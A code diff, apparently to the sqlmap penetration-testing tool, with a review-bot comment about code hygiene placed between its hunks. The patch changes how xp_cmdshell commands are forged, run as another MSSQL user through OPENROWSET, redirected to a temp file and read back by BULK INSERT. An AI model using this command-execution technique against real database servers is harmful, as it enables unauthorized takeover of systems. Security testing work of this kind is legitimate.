diff --git a/lib/core/agent.py b/lib/core/agent.py
index bb8cad288..bd2204000 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -820,15 +820,6 @@ class Agent:
 
     def runAsDBMSUser(self, query):
         if conf.dCred and "Ad Hoc Distributed Queries" not in query:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT %d;%s" % (randomInt(), query)
-
             query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
 
         return query
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 6e28f5028..1203bd876 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -148,12 +148,18 @@ class xp_cmdshell:
         self.xpCmdshellExecCmd(cmd)
 
     def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
+        if conf.dCred:
+            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
+            cmd = "%s > \"%s\"" % (cmd, self.tmpFile)
+
         self.__randStr = randomStr(lowercase=True)
         self.__cmd = "0x%s" % hexencode(cmd)
         self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
-        if insertIntoTable:
+
+        if insertIntoTable and not conf.dCred:
             self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
+
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
         return agent.runAsDBMSUser(self.__forgedCmd)
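Review bot: `self.tmpFile` is introduced as instance state inside the `conf.dCred` branch of `xpCmdshellForgeCmd` and is then read by a different method in the second hunk of lib/takeover/xp_cmdshell.py, so the two hunks are coupled through an attribute that, as far as this diff shows, is never given a default when `conf.dCred` is unset. Initialize it where the other instance attributes are set up, `self.tmpFile = None`, or have `xpCmdshellForgeCmd` return the path alongside the forged statement so the dependency is explicit at the call site. The same hunk also makes `insertIntoTable` a no-op whenever `conf.dCred` is set, which a caller cannot tell from the signature; a docstring should state it, e.g. `"""Build the xp_cmdshell statement for cmd; with conf.dCred set, output is redirected to self.tmpFile and insertIntoTable is ignored."""`. All of `xpCmdshellForgeCmd` lies within this hunk, while the consuming method in the second hunk starts and ends outside it.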
@@ -178,6 +184,11 @@ class xp_cmdshell:
                     output = new_output
         else:
             inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
+
+            if conf.dCred:
+                inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
+                self.delRemoteFile(self.tmpFile)
+
         query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
 
         if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)):
diff --git a/procs/mssqlserver/run_statement_as_user.txt b/procs/mssqlserver/run_statement_as_user.txt
index 46842737c..575c22ef5 100644
--- a/procs/mssqlserver/run_statement_as_user.txt
+++ b/procs/mssqlserver/run_statement_as_user.txt
@@ -1,2 +1,3 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
-# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')